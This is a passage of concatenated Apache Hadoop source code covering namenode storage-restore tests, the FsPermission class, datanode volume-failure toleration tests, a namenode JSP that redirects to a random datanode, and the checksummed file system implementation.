Storage.STORAGE_DIR_CURRENT + "/" + NameNodeFile.IMAGE.getName();
final String editsName =
Storage.STORAGE_DIR_CURRENT + "/" + NameNodeFile.EDITS.getName();
File fsImg1 = new File(path1, imgName);
File fsImg2 = new File(path2, imgName);
File fsImg3 = new File(path3, imgName);
File fsEdits1 = new File(path1, editsName);
File fsEdits2 = new File(path2, editsName);
File fsEdits3 = new File(path3, editsName);
if (expectValid) {
assertTrue(fsImg1.length() == fsImg2.length());
assertTrue(0 == fsImg3.length()); // Shouldn't be created
assertTrue(fsEdits1.length() == fsEdits2.length());
assertTrue(fsEdits1.length() == fsEdits3.length());
} else {
assertTrue(fsEdits1.length() != fsEdits2.length());
assertTrue(fsEdits1.length() != fsEdits3.length());
}
}
/**
* test
* 1. create DFS cluster with 3 storage directories - 2 EDITS_IMAGE, 1 EDITS
* 2. create a cluster and write a file
* 3. corrupt/disable one storage directory (or two) by removing it from use
* 4. run doCheckpoint - it will fail on removed dirs (which
* will invalidate the storages)
* 5. write another file
* 6. check that edits and fsimage differ
* 7. run doCheckpoint
* 8. verify that all the image and edits files are the same.
*/
@Test
public void testStorageRestore() throws Exception {
int numDatanodes = 2;
cluster = new MiniDFSCluster(0, config, numDatanodes, true,
false, true, null, null, null, null);
cluster.waitActive();
SecondaryNameNode secondary = new SecondaryNameNode(config);
FileSystem fs = cluster.getFileSystem();
Path path = new Path("/", "test");
writeFile(fs, path, 2);
invalidateStorage(cluster.getNameNode().getFSImage());
path = new Path("/", "test1");
writeFile(fs, path, 2);
checkFiles(false);
secondary.doCheckpoint();
checkFiles(true);
secondary.shutdown();
cluster.shutdown();
}
/**
* Test to simulate interleaved checkpointing by 2 2NNs after a storage
* directory has been taken offline. The first will cause the directory to
* come back online, but it won't have any valid contents. The second 2NN will
* then try to perform a checkpoint. The NN should not serve up the image or
* edits from the restored (empty) dir.
*/
@Test
public void testCheckpointWithRestoredDirectory() throws IOException {
SecondaryNameNode secondary = null;
try {
cluster = new MiniDFSCluster(0, config, 1, true, false, true,
null, null, null, null);
cluster.waitActive();
secondary = new SecondaryNameNode(config);
FSImage fsImage = cluster.getNameNode().getFSImage();
FileSystem fs = cluster.getFileSystem();
Path path1 = new Path("/", "test");
writeFile(fs, path1, 2);
// Take name3 offline
fsImage.getEditLog().removeEditsAndStorageDir(2);
// Simulate a 2NN beginning a checkpoint, but not finishing. This will
// cause name3 to be restored.
cluster.getNameNode().rollEditLog();
// Now another 2NN comes along to do a full checkpoint.
secondary.doCheckpoint();
// The created file should still exist in the in-memory FS state after the
// checkpoint.
assertTrue("File missing after checkpoint", fs.exists(path1));
secondary.shutdown();
// Restart the NN so it reloads the edits from on-disk.
cluster.restartNameNode();
// The created file should still exist after the restart.
assertTrue("path should still exist after restart", fs.exists(path1));
} finally {
if (cluster != null) {
cluster.shutdown();
}
if (secondary != null) {
secondary.shutdown();
}
}
}
}
<|start_filename|>src/core/org/apache/hadoop/fs/permission/FsPermission.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.fs.permission;
import java.io.DataInput;
import java.io.DataOutput;
import java.io.IOException;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.io.Writable;
import org.apache.hadoop.io.WritableFactories;
import org.apache.hadoop.io.WritableFactory;
/**
* A class for file/directory permissions.
*/
public class FsPermission implements Writable {
private static final Log LOG = LogFactory.getLog(FsPermission.class);
static final WritableFactory FACTORY = new WritableFactory() {
public Writable newInstance() { return new FsPermission(); }
};
static { // register a ctor
WritableFactories.setFactory(FsPermission.class, FACTORY);
WritableFactories.setFactory(ImmutableFsPermission.class, FACTORY);
}
/** Create an immutable {@link FsPermission} object. */
public static FsPermission createImmutable(short permission) {
return new ImmutableFsPermission(permission);
}
//POSIX permission style
private FsAction useraction = null;
private FsAction groupaction = null;
private FsAction otheraction = null;
private boolean stickyBit = false;
private FsPermission() {}
/**
* Construct by the given {@link FsAction}.
* @param u user action
* @param g group action
* @param o other action
*/
public FsPermission(FsAction u, FsAction g, FsAction o) {
this(u, g, o, false);
}
public FsPermission(FsAction u, FsAction g, FsAction o, boolean sb) {
set(u, g, o, sb);
}
/**
* Construct by the given mode.
* @param mode
* @see #toShort()
*/
public FsPermission(short mode) { fromShort(mode); }
/**
* Copy constructor
*
* @param other other permission
*/
public FsPermission(FsPermission other) {
this.useraction = other.useraction;
this.groupaction = other.groupaction;
this.otheraction = other.otheraction;
}
/**
* Construct by given mode, either in octal or symbolic format.
* @param mode mode as a string, either in octal or symbolic format
* @throws IllegalArgumentException if <code>mode</code> is invalid
*/
public FsPermission(String mode) {
this(new UmaskParser(mode).getUMask());
}
/** Return user {@link FsAction}. */
public FsAction getUserAction() {return useraction;}
/** Return group {@link FsAction}. */
public FsAction getGroupAction() {return groupaction;}
/** Return other {@link FsAction}. */
public FsAction getOtherAction() {return otheraction;}
private void set(FsAction u, FsAction g, FsAction o, boolean sb) {
useraction = u;
groupaction = g;
otheraction = o;
stickyBit = sb;
}
public void fromShort(short n) {
FsAction[] v = FsAction.values();
set(v[(n >>> 6) & 7], v[(n >>> 3) & 7], v[n & 7], (((n >>> 9) & 1) == 1) );
}
/** {@inheritDoc} */
public void write(DataOutput out) throws IOException {
out.writeShort(toShort());
}
/** {@inheritDoc} */
public void readFields(DataInput in) throws IOException {
fromShort(in.readShort());
}
/**
* Create and initialize a {@link FsPermission} from {@link DataInput}.
*/
public static FsPermission read(DataInput in) throws IOException {
FsPermission p = new FsPermission();
p.readFields(in);
return p;
}
/**
* Encode the object to a short.
*/
public short toShort() {
int s = (stickyBit ? 1 << 9 : 0) |
(useraction.ordinal() << 6) |
(groupaction.ordinal() << 3) |
otheraction.ordinal();
return (short)s;
}
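// For example: useraction=ALL (7), groupaction=READ_EXECUTE (5),
// otheraction=READ_EXECUTE (5), stickyBit=false encodes to 0755.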
/** {@inheritDoc} */
public boolean equals(Object obj) {
if (obj instanceof FsPermission) {
FsPermission that = (FsPermission)obj;
return this.useraction == that.useraction
&& this.groupaction == that.groupaction
&& this.otheraction == that.otheraction
&& this.stickyBit == that.stickyBit;
}
return false;
}
/** {@inheritDoc} */
public int hashCode() {return toShort();}
/** {@inheritDoc} */
public String toString() {
String str = useraction.SYMBOL + groupaction.SYMBOL + otheraction.SYMBOL;
if(stickyBit) {
StringBuilder str2 = new StringBuilder(str);
str2.replace(str2.length() - 1, str2.length(),
otheraction.implies(FsAction.EXECUTE) ? "t" : "T");
str = str2.toString();
}
return str;
}
/** Apply a umask to this permission and return a new one */
public FsPermission applyUMask(FsPermission umask) {
return new FsPermission(useraction.and(umask.useraction.not()),
groupaction.and(umask.groupaction.not()),
otheraction.and(umask.otheraction.not()));
}
/** umask property label */
public static final String DEPRECATED_UMASK_LABEL = "dfs.umask";
public static final String UMASK_LABEL = "dfs.umaskmode";
public static final int DEFAULT_UMASK = 0022;
/**
* Get the user file creation mask (umask)
*
* {@code UMASK_LABEL} config param has umask value that is either symbolic
* or octal.
*
* Symbolic umask is applied relative to file mode creation mask;
* the permission op character '+' clears the corresponding bits in the mask,
* while '-' sets bits in the mask.
*
* With an octal umask, the specified bits are set in the file mode creation mask.
*
* The {@code DEPRECATED_UMASK_LABEL} config param takes the umask value as a decimal integer.
*/
public static FsPermission getUMask(Configuration conf) {
int umask = DEFAULT_UMASK;
// To ensure backward compatibility first use the deprecated key.
// If the deprecated key is not present then check for the new key
if(conf != null) {
int oldStyleValue = conf.getInt(DEPRECATED_UMASK_LABEL, Integer.MIN_VALUE);
if(oldStyleValue != Integer.MIN_VALUE) { // Property was set with old key
LOG.warn(DEPRECATED_UMASK_LABEL + " configuration key is deprecated. " +
"Convert to " + UMASK_LABEL + ", using octal or symbolic umask " +
"specifications.");
umask = oldStyleValue;
} else {
String confUmask = conf.get(UMASK_LABEL);
if(confUmask != null) { // UMASK_LABEL is set
return new FsPermission(confUmask);
}
}
}
return new FsPermission((short)umask);
}
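// Illustrative usage (hypothetical values): reading the umask from a
// Configuration that sets the new octal key, then applying it.
//   Configuration conf = new Configuration();
//   conf.set(FsPermission.UMASK_LABEL, "022");            // octal umask
//   FsPermission umask = FsPermission.getUMask(conf);
//   FsPermission perm = FsPermission.getDefault().applyUMask(umask);  // 0755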
public boolean getStickyBit() {
return stickyBit;
}
/** Set the user file creation mask (umask) */
public static void setUMask(Configuration conf, FsPermission umask) {
conf.set(UMASK_LABEL, String.format("%1$03o", umask.toShort()));
}
/** Get the default permission. */
public static FsPermission getDefault() {
return new FsPermission((short)00777);
}
/**
* Create a FsPermission from a Unix symbolic permission string
* @param unixSymbolicPermission e.g. "-rw-rw-rw-"
*/
public static FsPermission valueOf(String unixSymbolicPermission) {
if (unixSymbolicPermission == null) {
return null;
}
else if (unixSymbolicPermission.length() != 10) {
throw new IllegalArgumentException("length != 10(unixSymbolicPermission="
+ unixSymbolicPermission + ")");
}
int n = 0;
for(int i = 1; i < unixSymbolicPermission.length(); i++) {
n = n << 1;
char c = unixSymbolicPermission.charAt(i);
n += (c == '-' || c == 'T' || c == 'S') ? 0: 1;
}
// Add sticky bit value if set
if(unixSymbolicPermission.charAt(9) == 't' ||
unixSymbolicPermission.charAt(9) == 'T')
n += 01000;
return new FsPermission((short)n);
}
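// For illustration: valueOf("-rwxr-xr-x").toShort() == 0755, and a
// trailing 't' or 'T' in the other-execute position adds the sticky
// bit (01000).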
private static class ImmutableFsPermission extends FsPermission {
public ImmutableFsPermission(short permission) {
super(permission);
}
public FsPermission applyUMask(FsPermission umask) {
throw new UnsupportedOperationException();
}
public void readFields(DataInput in) throws IOException {
throw new UnsupportedOperationException();
}
}
}
<|start_filename|>src/test/org/apache/hadoop/hdfs/server/datanode/TestDataNodeVolumeFailureToleration.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hdfs.server.datanode;
import java.io.File;
import java.io.IOException;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.FileUtil;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.hdfs.DFSTestUtil;
import org.apache.hadoop.hdfs.MiniDFSCluster;
import org.apache.hadoop.hdfs.server.namenode.FSNamesystem;
import org.apache.hadoop.hdfs.DFSConfigKeys;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.commons.logging.impl.Log4JLogger;
import org.apache.log4j.Level;
import org.junit.After;
import org.junit.Before;
import org.junit.Test;
import static org.junit.Assert.*;
import static org.junit.Assume.assumeTrue;
/**
* Test the ability of a DN to tolerate volume failures.
*/
public class TestDataNodeVolumeFailureToleration {
private static final Log LOG = LogFactory.getLog(TestDataNodeVolumeFailureToleration.class);
{
((Log4JLogger)TestDataNodeVolumeFailureToleration.LOG).getLogger().setLevel(Level.ALL);
}
private FileSystem fs;
private MiniDFSCluster cluster;
private Configuration conf;
private String dataDir;
// Sleep at least 3 seconds (a 1s heartbeat plus padding) to allow
// for heartbeats to propagate from the datanodes to the namenode.
final int WAIT_FOR_HEARTBEATS = 3000;
// Wait at least (2 * re-check + 10 * heartbeat) seconds for
// a datanode to be considered dead by the namenode.
final int WAIT_FOR_DEATH = 15000;
@Before
public void setUp() throws Exception {
conf = new Configuration();
conf.setLong("dfs.block.size", 512L);
/*
* Lower the DN heartbeat, DF rate, and recheck interval to one second
* so state about failures and datanode death propagates faster.
*/
conf.setInt(DFSConfigKeys.DFS_HEARTBEAT_INTERVAL_KEY, 1);
conf.setInt(DFSConfigKeys.DFS_DF_INTERVAL_KEY, 1000);
conf.setInt("heartbeat.recheck.interval", 1000);
// Allow a single volume failure (there are two volumes)
conf.setInt("dfs.datanode.failed.volumes.tolerated", 1);
cluster = new MiniDFSCluster(conf, 1, true, null);
cluster.waitActive();
fs = cluster.getFileSystem();
dataDir = cluster.getDataDirectory();
}
@After
public void tearDown() throws Exception {
for (int i = 0; i < 3; i++) {
new File(dataDir, "data"+(2*i+1)).setExecutable(true);
new File(dataDir, "data"+(2*i+2)).setExecutable(true);
}
cluster.shutdown();
}
/**
* Test the DFS_DATANODE_FAILED_VOLUMES_TOLERATED_KEY configuration
* option, i.e. the DN shuts itself down when the number of volume
* failures it experiences exceeds the tolerated amount.
*/
@Test
public void testConfigureMinValidVolumes() throws Exception {
assumeTrue(!System.getProperty("os.name").startsWith("Windows"));
// Bring up two additional datanodes that need both of their volumes
// functioning in order to stay up.
conf.setInt("dfs.datanode.failed.volumes.tolerated", 0);
cluster.startDataNodes(conf, 2, true, null, null);
cluster.waitActive();
FSNamesystem ns = cluster.getNameNode().getNamesystem();
long origCapacity = DFSTestUtil.getLiveDatanodeCapacity(ns);
long dnCapacity = DFSTestUtil.getDatanodeCapacity(ns, 0);
// Fail a volume on the 2nd DN
File dn2Vol1 = new File(dataDir, "data"+(2*1+1));
assertTrue("Couldn't chmod local vol", dn2Vol1.setExecutable(false));
// Should only get two replicas (the first DN and the 3rd)
Path file1 = new Path("/test1");
DFSTestUtil.createFile(fs, file1, 1024, (short)3, 1L);
DFSTestUtil.waitReplication(fs, file1, (short)2);
// Check that this single failure caused a DN to die.
DFSTestUtil.waitForDatanodeStatus(ns, 2, 1, 0,
origCapacity - (1*dnCapacity), WAIT_FOR_HEARTBEATS);
// If we restore the volume we should still only be able to get
// two replicas since the DN is still considered dead.
assertTrue("Couldn't chmod local vol", dn2Vol1.setExecutable(true));
Path file2 = new Path("/test2");
DFSTestUtil.createFile(fs, file2, 1024, (short)3, 1L);
DFSTestUtil.waitReplication(fs, file2, (short)2);
}
/**
* Restart the datanodes in the cluster with a new volume tolerated value.
* @param volTolerated
* @param manageDfsDirs
* @throws IOException
*/
private void restartDatanodes(int volTolerated, boolean manageDfsDirs)
throws IOException {
cluster.shutdownDataNodes();
conf.setInt("dfs.datanode.failed.volumes.tolerated", volTolerated);
cluster.startDataNodes(conf, 1, manageDfsDirs, null, null);
cluster.waitActive();
}
/**
* Test for different combination of volume configs and volumes
* tolerated values.
*/
@Test
public void testInvalidFailedVolumesConfig() throws Exception {
assumeTrue(!System.getProperty("os.name").startsWith("Windows"));
// Check if DN exits for an invalid conf value.
testVolumeConfig(-1, 0, false, true);
testVolumeConfig(100, 0, false, true);
// Test for one failed volume
testVolumeConfig(0, 1, false, false);
// Test for one failed volume with 1 tolerable volume
testVolumeConfig(1, 1, true, false);
// Test all good volumes
testVolumeConfig(0, 0, true, false);
// Test all failed volumes
testVolumeConfig(0, 2, false, false);
}
/**
* Tests for a given volumes to be tolerated and volumes failed.
*/
private void testVolumeConfig(int volumesTolerated, int volumesFailed,
boolean expectDnUp, boolean manageDfsDirs)
throws IOException, InterruptedException {
File dir0 = new File(dataDir, "data1");
File dir1 = new File(dataDir, "data2");
// Fail the current directory since invalid storage directory perms
// get fixed up automatically on datanode startup.
File[] currDirs = { new File(dir0, "/current"),
new File(dir1, "/current") };
try {
for (int i = 0; i < volumesFailed; i++) {
prepareDirToFail(currDirs[i]);
}
try {
restartDatanodes(volumesTolerated, manageDfsDirs);
assertEquals(expectDnUp, cluster.getDataNodes().get(0).isDatanodeUp());
} catch (IOException ioe) {
assertFalse("Expected successful restart but got " + ioe, expectDnUp);
}
} finally {
for (File dir : currDirs) {
FileUtil.chmod(dir.toString(), "755");
}
}
}
/**
* Prepare a directory to fail by setting its permissions to 000.
* @param dir
* @throws IOException
* @throws InterruptedException
*/
private void prepareDirToFail(File dir) throws IOException,
InterruptedException {
dir.mkdirs();
assertEquals("Couldn't chmod local vol", 0,
FileUtil.chmod(dir.toString(), "000"));
}
/**
* Test that a volume that is considered failed on startup is seen as
* a failed volume by the NN.
*/
@Test
public void testFailedVolumeOnStartupIsCounted() throws Exception {
assumeTrue(!System.getProperty("os.name").startsWith("Windows"));
FSNamesystem ns = cluster.getNameNode().getNamesystem();
long origCapacity = DFSTestUtil.getLiveDatanodeCapacity(ns);
File dir = new File(dataDir, "data1/current");
try {
prepareDirToFail(dir);
restartDatanodes(1, false);
// The cluster is up..
assertTrue(cluster.getDataNodes().get(0).isDatanodeUp());
// but there has been a single volume failure
DFSTestUtil.waitForDatanodeStatus(ns, 1, 0, 1,
origCapacity / 2, WAIT_FOR_HEARTBEATS);
} finally {
FileUtil.chmod(dir.toString(), "755");
}
}
}
<|start_filename|>src/webapps/hdfs/nn_browsedfscontent.jsp<|end_filename|>
<%@ page
contentType="text/html; charset=UTF-8"
import="java.io.*"
import="java.security.PrivilegedExceptionAction"
import="java.util.*"
import="javax.servlet.*"
import="javax.servlet.http.*"
import="org.apache.hadoop.conf.Configuration"
import="org.apache.hadoop.hdfs.*"
import="org.apache.hadoop.hdfs.server.namenode.*"
import="org.apache.hadoop.hdfs.server.datanode.*"
import="org.apache.hadoop.hdfs.protocol.*"
import="org.apache.hadoop.hdfs.security.token.delegation.*"
import="org.apache.hadoop.io.Text"
import="org.apache.hadoop.security.UserGroupInformation"
import="org.apache.hadoop.security.token.Token"
import="org.apache.hadoop.util.*"
import="java.text.DateFormat"
import="java.net.InetAddress"
import="java.net.URLEncoder"
%>
<%!
static String getDelegationToken(final NameNode nn,
HttpServletRequest request, Configuration conf)
throws IOException, InterruptedException {
final UserGroupInformation ugi = JspHelper.getUGI(request, conf);
Token<DelegationTokenIdentifier> token =
ugi.doAs(
new PrivilegedExceptionAction<Token<DelegationTokenIdentifier>>()
{
public Token<DelegationTokenIdentifier> run() throws IOException {
return nn.getDelegationToken(new Text(ugi.getUserName()));
}
});
return token.encodeToUrlString();
}
public void redirectToRandomDataNode(
NameNode nn,
HttpServletRequest request,
HttpServletResponse resp,
Configuration conf
) throws IOException, InterruptedException {
String tokenString = null;
if (UserGroupInformation.isSecurityEnabled()) {
tokenString = getDelegationToken(nn, request, conf);
}
FSNamesystem fsn = nn.getNamesystem();
String datanode = fsn.randomDataNode();
String redirectLocation;
String nodeToRedirect;
int redirectPort;
if (datanode != null) {
redirectPort = Integer.parseInt(datanode.substring(datanode.indexOf(':')
+ 1));
nodeToRedirect = datanode.substring(0, datanode.indexOf(':'));
}
else {
nodeToRedirect = nn.getHttpAddress().getHostName();
redirectPort = nn.getHttpAddress().getPort();
}
String fqdn = InetAddress.getByName(nodeToRedirect).getCanonicalHostName();
redirectLocation = "http://" + fqdn + ":" + redirectPort +
"/browseDirectory.jsp?namenodeInfoPort=" +
nn.getHttpAddress().getPort() +
"&dir=/" +
(tokenString == null ? "" :
JspHelper.getDelegationTokenUrlParam(tokenString));
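// The resulting redirect looks roughly like this (hypothetical host and ports):
// http://dn1.example.com:50075/browseDirectory.jsp?namenodeInfoPort=50070&dir=/&delegation=<token>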
resp.sendRedirect(redirectLocation);
}
%>
<html>
<title></title>
<body>
<%
NameNode nn = (NameNode)application.getAttribute("name.node");
Configuration conf = (Configuration) application.getAttribute(JspHelper.CURRENT_CONF);
redirectToRandomDataNode(nn, request, response, conf);
%>
<hr>
<h2>Local logs</h2>
<a href="/logs/">Log</a> directory
<%
out.println(ServletUtil.htmlFooter());
%>
<|start_filename|>src/core/org/apache/hadoop/fs/ChecksumFileSystem.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.fs;
import java.io.*;
import java.util.Arrays;
import java.util.zip.CRC32;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.permission.FsPermission;
import org.apache.hadoop.util.Progressable;
import org.apache.hadoop.util.PureJavaCrc32;
import org.apache.hadoop.util.StringUtils;
/****************************************************************
* Abstract checksummed FileSystem.
* It provides a basic implementation of a checksummed FileSystem,
* which creates a checksum file for each raw file.
* It generates and verifies checksums at the client side.
*
*****************************************************************/
public abstract class ChecksumFileSystem extends FilterFileSystem {
private static final byte[] CHECKSUM_VERSION = new byte[] {'c', 'r', 'c', 0};
private int bytesPerChecksum = 512;
private boolean verifyChecksum = true;
public static double getApproxChkSumLength(long size) {
return ChecksumFSOutputSummer.CHKSUM_AS_FRACTION * size;
}
public ChecksumFileSystem(FileSystem fs) {
super(fs);
}
public void setConf(Configuration conf) {
super.setConf(conf);
if (conf != null) {
bytesPerChecksum = conf.getInt("io.bytes.per.checksum", 512);
}
}
/**
* Set whether to verify checksum.
*/
public void setVerifyChecksum(boolean verifyChecksum) {
this.verifyChecksum = verifyChecksum;
}
/** get the raw file system */
public FileSystem getRawFileSystem() {
return fs;
}
/** Return the name of the checksum file associated with a file.*/
public Path getChecksumFile(Path file) {
return new Path(file.getParent(), "." + file.getName() + ".crc");
}
/** Return true iff file is a checksum file name.*/
public static boolean isChecksumFile(Path file) {
String name = file.getName();
return name.startsWith(".") && name.endsWith(".crc");
}
/** Return the length of the checksum file given the size of the
* actual file.
**/
public long getChecksumFileLength(Path file, long fileSize) {
return getChecksumLength(fileSize, getBytesPerSum());
}
/** Return the bytes Per Checksum */
public int getBytesPerSum() {
return bytesPerChecksum;
}
private int getSumBufferSize(int bytesPerSum, int bufferSize) {
int defaultBufferSize = getConf().getInt("io.file.buffer.size", 4096);
int proportionalBufferSize = bufferSize / bytesPerSum;
return Math.max(bytesPerSum,
Math.max(proportionalBufferSize, defaultBufferSize));
}
/*******************************************************
* For open()'s FSInputStream
* It verifies that data matches checksums.
*******************************************************/
private static class ChecksumFSInputChecker extends FSInputChecker {
public static final Log LOG
= LogFactory.getLog(FSInputChecker.class);
private ChecksumFileSystem fs;
private FSDataInputStream datas;
private FSDataInputStream sums;
private static final int HEADER_LENGTH = 8;
private int bytesPerSum = 1;
private long fileLen = -1L;
public ChecksumFSInputChecker(ChecksumFileSystem fs, Path file)
throws IOException {
this(fs, file, fs.getConf().getInt("io.file.buffer.size", 4096));
}
public ChecksumFSInputChecker(ChecksumFileSystem fs, Path file, int bufferSize)
throws IOException {
super( file, fs.getFileStatus(file).getReplication() );
this.datas = fs.getRawFileSystem().open(file, bufferSize);
this.fs = fs;
Path sumFile = fs.getChecksumFile(file);
try {
int sumBufferSize = fs.getSumBufferSize(fs.getBytesPerSum(), bufferSize);
sums = fs.getRawFileSystem().open(sumFile, sumBufferSize);
byte[] version = new byte[CHECKSUM_VERSION.length];
sums.readFully(version);
if (!Arrays.equals(version, CHECKSUM_VERSION))
throw new IOException("Not a checksum file: "+sumFile);
this.bytesPerSum = sums.readInt();
set(fs.verifyChecksum, new PureJavaCrc32(), bytesPerSum, 4);
} catch (FileNotFoundException e) { // quietly ignore
set(fs.verifyChecksum, null, 1, 0);
} catch (IOException e) { // loudly ignore
LOG.warn("Problem opening checksum file: "+ file +
". Ignoring exception: " +
StringUtils.stringifyException(e));
set(fs.verifyChecksum, null, 1, 0);
}
}
private long getChecksumFilePos( long dataPos ) {
return HEADER_LENGTH + 4*(dataPos/bytesPerSum);
}
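// Worked example (illustrative): with bytesPerSum = 512 and dataPos = 1024,
// the position falls in chunk 1024/512 = 2, so the matching CRC starts at
// HEADER_LENGTH + 4*2 = 16 bytes into the checksum file (8 header bytes plus
// one 4-byte CRC per preceding chunk).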
protected long getChunkPosition( long dataPos ) {
return dataPos/bytesPerSum*bytesPerSum;
}
public int available() throws IOException {
return datas.available() + super.available();
}
public int read(long position, byte[] b, int off, int len)
throws IOException {
// parameter check
if ((off | len | (off + len) | (b.length - (off + len))) < 0) {
throw new IndexOutOfBoundsException();
} else if (len == 0) {
return 0;
}
if( position<0 ) {
throw new IllegalArgumentException(
"Parameter position can not to be negative");
}
ChecksumFSInputChecker checker = new ChecksumFSInputChecker(fs, file);
checker.seek(position);
int nread = checker.read(b, off, len);
checker.close();
return nread;
}
public void close() throws IOException {
datas.close();
if( sums != null ) {
sums.close();
}
set(fs.verifyChecksum, null, 1, 0);
}
@Override
public boolean seekToNewSource(long targetPos) throws IOException {
long sumsPos = getChecksumFilePos(targetPos);
fs.reportChecksumFailure(file, datas, targetPos, sums, sumsPos);
boolean newDataSource = datas.seekToNewSource(targetPos);
return sums.seekToNewSource(sumsPos) || newDataSource;
}
@Override
protected int readChunk(long pos, byte[] buf, int offset, int len,
byte[] checksum) throws IOException {
boolean eof = false;
if(needChecksum()) {
try {
long checksumPos = getChecksumFilePos(pos);
if(checksumPos != sums.getPos()) {
sums.seek(checksumPos);
}
sums.readFully(checksum);
} catch (EOFException e) {
eof = true;
}
len = bytesPerSum;
}
if(pos != datas.getPos()) {
datas.seek(pos);
}
int nread = readFully(datas, buf, offset, len);
if( eof && nread > 0) {
throw new ChecksumException("Checksum error: "+file+" at "+pos, pos);
}
return nread;
}
/* Return the file length */
private long getFileLength() throws IOException {
if( fileLen==-1L ) {
fileLen = fs.getContentSummary(file).getLength();
}
return fileLen;
}
/**
* Skips over and discards <code>n</code> bytes of data from the
* input stream.
*
* The <code>skip</code> method may skip a smaller number of bytes if the end
* of file is reached before <code>n</code> bytes have been skipped.
* The actual number of bytes skipped is returned. If <code>n</code> is
* negative, no bytes are skipped.
*
* @param n the number of bytes to be skipped.
* @return the actual number of bytes skipped.
* @exception IOException if an I/O error occurs.
* ChecksumException if the chunk to skip to is corrupted
*/
public synchronized long skip(long n) throws IOException {
long curPos = getPos();
long fileLength = getFileLength();
if( n+curPos > fileLength ) {
n = fileLength - curPos;
}
return super.skip(n);
}
/**
* Seek to the given position in the stream.
* The next read() will be from that position.
*
* <p>This method does not allow seeking past the end of the file.
* Doing so produces an IOException.
*
* @param pos the position to seek to.
* @exception IOException if an I/O error occurs or seeks after EOF
* ChecksumException if the chunk to seek to is corrupted
*/
public synchronized void seek(long pos) throws IOException {
if(pos>getFileLength()) {
throw new IOException("Cannot seek after EOF");
}
super.seek(pos);
}
}
/**
* Opens an FSDataInputStream at the indicated Path.
* @param f the file name to open
* @param bufferSize the size of the buffer to be used.
*/
@Override
public FSDataInputStream open(Path f, int bufferSize) throws IOException {
return new FSDataInputStream(
new ChecksumFSInputChecker(this, f, bufferSize));
}
/** {@inheritDoc} */
public FSDataOutputStream append(Path f, int bufferSize,
Progressable progress) throws IOException {
throw new IOException("Not supported");
}
/**
* Calculates the length of the checksum file in bytes.
* @param size the length of the data file in bytes
* @param bytesPerSum the number of bytes in a checksum block
* @return the number of bytes in the checksum file
*/
public static long getChecksumLength(long size, int bytesPerSum) {
//the checksum length is 4 bytes for every bytesPerSum-sized chunk of data,
//plus the header bytes written at the beginning of the checksum file.
return ((size + bytesPerSum - 1) / bytesPerSum) * 4 +
CHECKSUM_VERSION.length + 4;
}
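// Worked example (illustrative): for a 2000 byte file with bytesPerSum = 512,
// there are ceil(2000/512) = 4 chunks, so the checksum file holds 4*4 = 16 CRC
// bytes plus the 4-byte version header and the 4-byte bytesPerSum field,
// i.e. getChecksumLength(2000, 512) == 24.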
/** This class provides an output stream for a checksummed file.
* It generates checksums for data. */
private static class ChecksumFSOutputSummer extends FSOutputSummer {
private FSDataOutputStream datas;
private FSDataOutputStream sums;
private static final float CHKSUM_AS_FRACTION = 0.01f;
public ChecksumFSOutputSummer(ChecksumFileSystem fs,
Path file,
boolean overwrite,
short replication,
long blockSize,
Configuration conf)
throws IOException {
this(fs, file, overwrite,
conf.getInt("io.file.buffer.size", 4096),
replication, blockSize, null);
}
public ChecksumFSOutputSummer(ChecksumFileSystem fs,
Path file,
boolean overwrite,
int bufferSize,
short replication,
long blockSize,
Progressable progress)
throws IOException {
super(new PureJavaCrc32(), fs.getBytesPerSum(), 4);
int bytesPerSum = fs.getBytesPerSum();
this.datas = fs.getRawFileSystem().create(file, overwrite, bufferSize,
replication, blockSize, progress);
int sumBufferSize = fs.getSumBufferSize(bytesPerSum, bufferSize);
this.sums = fs.getRawFileSystem().create(fs.getChecksumFile(file), true,
sumBufferSize, replication,
blockSize);
sums.write(CHECKSUM_VERSION, 0, CHECKSUM_VERSION.length);
sums.writeInt(bytesPerSum);
}
public void close() throws IOException {
flushBuffer();
sums.close();
datas.close();
}
@Override
protected void writeChunk(byte[] b, int offset, int len, byte[] checksum)
throws IOException {
datas.write(b, offset, len);
sums.write(checksum);
}
}
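// Layout of the checksum file produced above (derived from the constructor and
// writeChunk): the 4-byte CHECKSUM_VERSION magic, a 4-byte int holding
// bytesPerSum, then one 4-byte CRC for each bytesPerSum-sized chunk of the data
// file. ChecksumFSInputChecker reads the same header back when verifying.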
/** {@inheritDoc} */
@Override
